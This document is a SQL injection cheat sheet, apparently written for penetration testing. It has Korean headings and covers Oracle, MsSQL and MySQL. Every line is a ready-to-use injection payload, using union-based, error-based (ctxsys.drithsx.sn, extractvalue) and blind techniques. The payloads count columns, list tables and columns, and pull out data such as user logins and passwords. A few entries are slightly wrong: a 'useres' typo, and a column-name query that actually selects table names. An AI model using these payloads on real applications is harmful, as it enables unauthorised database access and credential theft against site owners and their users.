Oracle
Union SQL
' order by 1--
# 데이터 형 조회
' union select null ,null, null from dual--
' union select null, null, 123 from dual--
' union select null, null, 'abc' from dual--
# 테이블 명 조회
' union select null,table_name, null, null from all_tables--
# 컬럼 명 조회
' union select null, column_name, null, null from all_tab_columns where table_name='mytable'--
# 데이터 조회
' union select null, data, null, name from mytable--
Error Based SQL
# 테이블 개수 확인
' and ctxsys.drithsx.sn(user,(select count(table_name) from user_tables))=1 and '%1%'='%1
# 테이블 명 조회
' and ctxsys.drithsx.sn(user,(select table_name from (select table_name, rownum as rnum from user_tables) where rnum=1))=1 and '%1%'='%1
# 테이블 컬럼 개수 조회
' and ctxsys.drithsx.sn(user,(select count(column_name) from all_tab_columns where table_name='mytable'))=1 and '%1%'='%1
# 컬럼 명 조회
' and ctxsys.drithsx.sn(user,(select column_name from (select column_name,rownum as rnum from all_tab_columns where table_name='mytable') where rnum=1))= 1 and '%1%'='%1
# 데이터 개수 조회
' and ctxsys.drithsx.sn(user,(select count(ANSWER_COLUMN) from mytable))=1 and '%1%'='%1
# 데이터 조회
' and ctxsys.drithsx.sn(user,(select ANSWER_COLUMN from (select ANSWER_COLUMN, rownum as rnum from mytable) where rnum=1))=1 and '%1%'='%1
Blind SQL
# 테이블 개수 확인
' and (select count(table_name) from all_tables) < 74 --
# 테이블 명 조회
' and ascii(substr((select table_name from (select rownum as rnum,table_name from user_tables) where rnum=1),1,1)) < 130 --
# 컬럼 개수 조회
' and (select count(column_name) from all_tab_columns where table_name='mytable')=21 --
# 컬럼명 조회
' and ascii(substr((select column_name from (select rownum as rnum, column_name from all_tab_columns where table_name ='mytable') where rnum=1),1,1)) < 130 --
# 데이터 수 조회
' and (select count(userID) from mytable) < 324 --
# 데이터 조회
' AND ASCII(SUBSTR((SELECT userID FROM (SELECT ROWNUM AS RNUM, userID FROM mytable) WHERE RNUM=1),1,1)) < 130 --
MsSQL
Union SQL
# 컬럼 개수 파악
' union select null, null from information_schema.tables --
# 컬럼 데이터 형 파악
' union select '1234', null from information_schema.tables --
# 테이블 명 조회
' union select table_name, null from information_schema.tables --
# 컬럼 명 조회
' union select column_name, null from information_schema.columns where table_name='user' --
# 데이터 확인
' union select id, null from users --
' union select name, null from users --
' union select pass, null from useres --
MySQL
Union SQL
# 컬럼 개수 파악
' order by 24#
' or 1=2 union select 1,2,3,4,5,6,7,8,9,@@version,11#
# 테이블 명 조회
' or 1=2 union select 1,2,3,4,5,6,7,8,9,table_name,11 from information_schema.tables#
# 컬럼 명 조회
' or 1=2 union select 1,2,3,4,5,6,7,8,9,column_name,11 from information_schema.columns WHERE table_name='mytable'#
# 데이터 확인
' or 1=2 union select 1,2,3,4,5,6,7,8,9,user_login,11 from mytable#
' or 1=2 union select 1,2,3,4,5,6,7,8,9,user_pass,11 from mytable#
Error Based SQL
' and extractvalue(rand(),concat(0x3a,version())) and '%1%'='%1
# 데이터베이스 명 조회
' and extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 0,1))) and '%1%'='%1
# 테이블 명 조회
' and extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,TABLE_NAME) FROM information_schema.TABLES WHERE table_schema="mytable" LIMIT 0,1))) and '%1%'='%1
# 컬럼 명 조회
' and extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_NAME="mytable" LIMIT 0,1))) and '%1%'='%1